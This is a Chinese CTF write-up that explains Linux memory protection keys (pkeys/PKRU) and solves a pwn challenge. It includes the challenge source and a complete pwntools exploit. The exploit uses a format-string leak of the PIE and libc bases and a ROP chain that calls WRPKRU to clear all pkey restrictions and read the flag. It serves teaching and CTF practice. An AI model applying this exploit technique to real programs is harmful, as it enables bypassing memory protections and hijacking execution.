[PWN] Linux中的pkeys安全机制及绕过

华盟原创文章投稿奖励计划

简单介绍

(Memory Protection Keys for Userspace,PKU,亦 即PKEYs)内存保护键提供了一种强制实施基于页的保护机制,可以快速调整某些内存区域的执行权限,而不是像传统的mprotect那样,触发页表项的修改,从而导致TLB(快速查找缓存)刷新,影响性能。


先来说说传统的mprotect(),它的工作机制是通过修改目标内存区域的页表项(PTE)的权限位实现内存保护,属于进程全局事件,会导致TLB的刷新,因此切换权限成本高。


pkeys是通过在页表中写入静态保护键标识,真正权限定义在线程局部寄存器中,需要修改目标内存区域的权限只需要修改寄存器就行了,作用局限于线程,不涉及页表和TLB的修改,权限切换非常高效。

x86_64实现

x86_64架构中,每个页表中,将 4 个先前保留的位专门用于一个“保护键”,从而提供16 个可能的键

0000  Pkey 0 0001  Pkey 1 0010  Pkey 2  1111  Pkey 15


每个键的保护由一个 per-CPU 用户可访问寄存器 (PKRU) 定义。每个 PKRU 都是一个32 位寄存器,为 16 个键中的每个键存储两位访问禁用和写入禁用)。也就是说PKRU寄存器存储16个保护键的权限,每个保护键占用2位,可以组合为4种权限,每个保护键对应的权限设置被称为一个控制集

00:无权限 01:只读(写入禁用) 10:无访问(访问禁用) 11:读写(无禁用)


举个栗子:假设有一个线程,它的内存中有三个不同的区域,并且这三个区域被分别分配了不同的保护键:

区域 A(保护键 Pkey 0):只读(只能读取,不能写入) 区域 B(保护键 Pkey 1):可读可写(可以读取,也可以写入) 区域 C(保护键 Pkey 2):禁止访问(既不能读取,也不能写入)


然后,线程的PKRU 寄存器中可能存储的内容是:

Pkey 0:只读 Pkey 1:可读可写 Pkey 2:禁止访问
  • 如果线程访问区域 A,它只能读取数据,无法写入。
  • 如果线程访问区域 B,它可以同时读取和写入数据
  • 如果线程访问区域 C,它根本无法访问这块内存,系统会阻止这个访问。


有两条特殊指令管理保护键的读写:

RDPKRU:用于读取当前线程的保护键权限设置。通过这条指令,CPU 将返回一个32位值,包含当前线程的所有保护键的权限设置。


WRPKRU:用于更新当前线程的保护键权限设置。通过这条指令,操作系统或应用程序可以修改特定保护键的访问权限。


PKRU是与线程绑定的,也就是说,不同的线程可以有不同的保护键权限设置。由于 PKRU 寄存器是per-CPU的,每个线程的保护权限都可以在不同的 CPU 上独立设置。同样,当一个线程在不同的 CPU 核心上切换时,操作系统会保证 PKRU 寄存器的状态(即保护键权限)正确地切换,以确保内存访问控制的一致性。


保护键主要应用于内存页的访问控制。在数据访问时,Pkey 的权限会被强制执行,但它对指令获取(如程序代码段的访问)没有影响。这意味着x86下的Pkeys只对用户空间内存的读写权限有控制作用,无法对代码段执行权限进行限制

arm64实现

arm64就简单介绍一下,在arm64下,Pkeys 在每个页表项中使用 3 位来编码一个“保护键索引”,从而提供 8 个可能的键:

000 → Pkey 0 001 → Pkey 1 010 → Pkey 2 011 → Pkey 3 100 → Pkey 4 101 → Pkey 5 110 → Pkey 6 111 → Pkey 7

每个键的保护由一个 per-CPU 用户可写系统寄存器 (POR_EL0) 定义。这是一个 64 位寄存器,用于编码每个保护键索引的读、写和执行覆盖权限。


arm64下实现的pkeys也是线程独立的,但是arm64_pkeys的保护键权限不仅适用于数据控制访问,也适用于程序代码的执行权限

系统调用

有 3 个系统调用直接与 pkeys 交互:

  • pkey_alloc():分配一个新的保护键。
  • pkey_free():释放之前分配的保护键。
  • pkey_mprotect():修改内存区域的保护权限。

pkey_alloc()

intpkey_alloc(unsignedlong flags, unsignedlong init_access_rights);


这个系统调用用来分配一个新的保护键(Pkey)。

  • flags:控制标志,目前通常为 0。
  • init_access_rights:设置这个保护键的初始访问权限。这个值通常会传递像 PKEY_DISABLE_WRITE 这样的标志,用于初始化该保护键的权限。


返回分配的保护键的 ID,成功时返回保护键的 ID,失败时返回负数。

pkey_free()

intpkey_free(int pkey);


这个调用会释放之前分配的保护键。

  • pkey:要释放的保护键的 ID。

成功时返回 0,失败时返回负数。

pkey_mprotect()

intpkey_mprotect(unsignedlong start, size_t len, unsignedlong prot, int pkey)

这个调用可以修改指定内存区域的保护权限,并将其与指定的保护键关联。

  • start:要修改保护权限的内存区域的起始地址。
  • len:要修改的内存区域的长度。
  • prot:新的访问权限,类似于mprotect() 中使用的 PROT_READ、PROT_WRITE 等标志。
  • pkey:要关联的保护键。


成功时返回 0,失败时返回负数。


下面用一道题介绍CTF PWN中pkeys的使用和绕过

?CTF week3 弥达斯之触

源码:

#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <memory.h> #include <sys/mman.h> #include <bpf_insn.h> #include <linux/filter.h> #include <sys/prctl.h> #include <seccomp.h> #include <stddef.h>  // __attribute__((constructor)) voidthe_curse_of_midas() { struct sock_filter filter[] = { BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)), // 加载系统调用号到寄存器  // BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_execve, 6, 0), // BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_execveat, 5, 0), BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_open, 40), BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_openat, 30), BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_mmap, 20), BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_mprotect, 10),  // 只允许上述调用 BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),  //其他全kill BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),     }; struct sock_fprog prog = {         .len = sizeof(filter)/sizeof(filter[0]),         .filter = filter,     };  if (prctl(PR_SET_NO_NEW_PRIVS, 1000)) { perror("prctl(NO_NEW_PRIVS)");     }  if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != 0) { perror("prctl(SECCOMP)");     }  asm( "mov rdx, 0xf;" "begin:;" "dec rdx;" "jz end;" "mov rax, 0x14a;"//这里是pkey_mprotect() "xor edi, edi;" "mov rsi, 1;" "syscall;" "jmp begin;" "end:;"     ); }  //自定义pkey,在这里实现了pkeys int _mprotect(void *addr, __int64_t len, int prot) { int pkey = (rand()%15)+1;//随机生成pkey 1~15 asm volatile( "mov rax, %4;"  // syscall number "mov rdi, %0;"  // 1st arg: addr "mov rsi, %1;"  // 2nd arg: len "mov rdx, %2;"  // 3rd arg: prot "mov r10d, %3;" // 4th arg: pkey "syscall;"//这里是pkey_alloc()(0x149)         :         : "r"(addr), "r"(len), "r"(prot), "r"(pkey), "i"(0x149)         : "rax""rdi""rsi""rdx""r10""rcx""r11""memory"     ); }  voidinit(void *secret){ setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); srand(((longlong)rand())>>24); int fd = open("/flag"00); read(fd, secret, 0x100); close(fd);  the_curse_of_midas();     _mprotect(secret, 0x10007); }  char buf[0x100]; intmain(){ void *secret_of_midas = mmap(0x10000x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -10); init(secret_of_midas);  printf("远道而来的年轻人,你也是来寻找弥达斯的秘密吗?\n"); read(0, buf, 20); printf(buf); printf("噢不,噢不,你太心急了。\n");     _mprotect(secret_of_midas, 0x10001); sleep(1);  printf("那些关于黄金的诅咒,正在这片古老土地的血管里涌动。\n"); sleep(1);  printf("你应当保持警惕。\n"); sleep(1);  printf("那么,告诉我你的名字,我将引领你去往神圣之地:\n"); read(0, buf, 0x100); printf("有趣。去你想去的地方吧。\n"); asm("mov rbp, %0;"         :         : "r"(buf)     ); }


这里面用到了两个pkeys相关的系统调用:

0x14a __NR_pkey_mprotect	给某个页设置权限 + 附加 PKey 0x149	__NR_pkey_alloc     分配一个 PKey


先看这段代码:

asm( "mov rdx, 0xf;" "begin:;" "dec rdx;" "jz end;" "mov rax, 0x14a;"   // 系统调用号 "xor edi, edi;"     // addr = NULL "mov rsi, 1;"       // len = 1 "syscall;" "jmp begin;" "end:;" );


正常pkey_mprotect(addr,len,prot,pkey)应用于有效内存,但这里给的地址无效

当 addr 无效时,pkey_mprotect不会设置页权限,但仍然更新 pkru 中对应 pkey 的权限位。


所以这里是随机修改不同 pkey 的读/写权限,使得未来分配的 pkey 权限是不可预测的。


再看这段:

int _mprotect(void *addr, __int64_t len, int prot) { int pkey = (rand()%15)+1; asm volatile( "mov rax, %4;"  // syscall number "mov rdi, %0;"  // 1st arg: addr "mov rsi, %1;"  // 2nd arg: len "mov rdx, %2;"  // 3rd arg: prot "mov r10d, %3;" // 4th arg: pkey "syscall;"         :         : "r"(addr), "r"(len), "r"(prot), "r"(pkey), "i"(0x149)         : "rax""rdi""rsi""rdx""r10""rcx""r11""memory"     ); }


其内部随机选择 pkey,而当后面flag 所在内存执行这句:

_mprotect(secret, 0x1000, 7);


会从1~15随机选取一个pkey,而这 15 个 key 此时权限早已被the_curse_of_midas()随机污染。


所以当_mprotect绑定页时,权限不可预测,大多数情况下不能直接读,限制了读取flag


看这里:

_mprotect(secret, 0x1000, 7);


7 =

PROT_READ(1) | PROT_WRITE(2) | PROT_EXEC(4)


此时页表层面权限是RWX,但PKRU层面是根据pkey附加限制覆盖访问权限的,所以最后大概率不能直接读flag。


那么如何绕过呢?


之前提到有两条特殊指令管理保护键的读写,分别是RDPKRUWRPKRU,其中WRPKRU可以修改特定保护键的访问权限。


在题目给的libc库中寻找这条指令:

自动草稿

偏移是0x126256

WRPKRU的使用约束是ECX 和 EDX 必须为 0。如果不满足,结果未定义或者会 #UD(非法指令行为)


PKRU权限表如下:

AD WD 含义
0 0 读写允许(R/W)
0 1 只读(R)
1 0 禁止访问(既不能读也不能写)
1 1 禁止访问(同上)


而参照这个表,我们肯定想修改目标区域权限为00(可读可写),而在EAX(装载 PKRU 的值)里写一个0,EAX = 0x00000000

直接就可以把全部pkey权限都变成00

pkey 对应 PKRU bit
0 bit 1..0
1 bit 3..2
2 bit 5..4
15 bit 31..30
所有 pkey AD = 0 WD = 0 权限
PKEY 0 0 0 可读写
PKEY 1 0 0 可读写
PKEY 2 0 0 可读写
PKEY 15 0 0 可读写


知道这些就可以写exp了


先看fmt的偏移
自动草稿


0x1的偏移是8

自动草稿


用这条绕过pie(其实没必要,顺手绕一下),fmt偏移是11,程序基址偏移是0x153B

自动草稿
自动草稿


这条泄露libc,fmt偏移是29,libc偏移是0x29e40


在根目录放个flag测试文件


exp

from pwn import * context.arch='amd64' context.log_level='debug'  #p=remote('challenge.ilovectf.cn',30377) p=process('./midas') elf=ELF('./midas') libc=ELF('./libc.so.6')  fmt=b'%11$p%29$p' p.recvuntil('\n') p.send(fmt)  p.recvuntil(b'0x') base=int(p.recv(12),16)-0x153b success(f"pie:{hex(base)}")  p.recvuntil(b'0x') libcbase=int(p.recv(12),16)-0x29e40 success(f"libc:{hex(libcbase)}")  wrpkru=libcbase+0x126256  rdi = libcbase + libc.search(asm("pop rdi; ret"), executable=True).__next__() rsi = libcbase + libc.search(asm("pop rsi; ret"), executable=True).__next__() dx_cx_bx = libcbase + libc.search(asm("pop rdx; pop rcx; pop rbx; ret;"), executable=True).__next__() rax = libcbase + libc.search(asm("pop rax; ret"), executable=True).__next__()  pl=b'a'*8+p64(rdi+1)+p64(dx_cx_bx)+p64(0)*3+p64(rax)+p64(0)+p64(wrpkru)+p64(rdi)+p64(0x10000)+p64(libcbase+libc.sym['puts']) sleep(3)  #gdb.attach(p) p.send(pl)  p.interactive()


在输入后打个断点,看到此时pkru寄存器的值是0x55555554

自动草稿

被改成了0x0

自动草稿


成功绕过并输出flag

自动草稿


exp小贴士:可以注意到payload中在覆盖掉rbp后,又加了一个p64(rdi+1)(=ret),这是为了保证栈对齐。

在调用libc时,调用点的RSP必须是16字节对齐(即进入callRSP%16 == 8),这是为了满足 System V ABI 对齐规则。

本文来源看雪学苑,经授权后由华盟君发布,观点不代表华盟网的立场,转载请联系原作者。

发表回复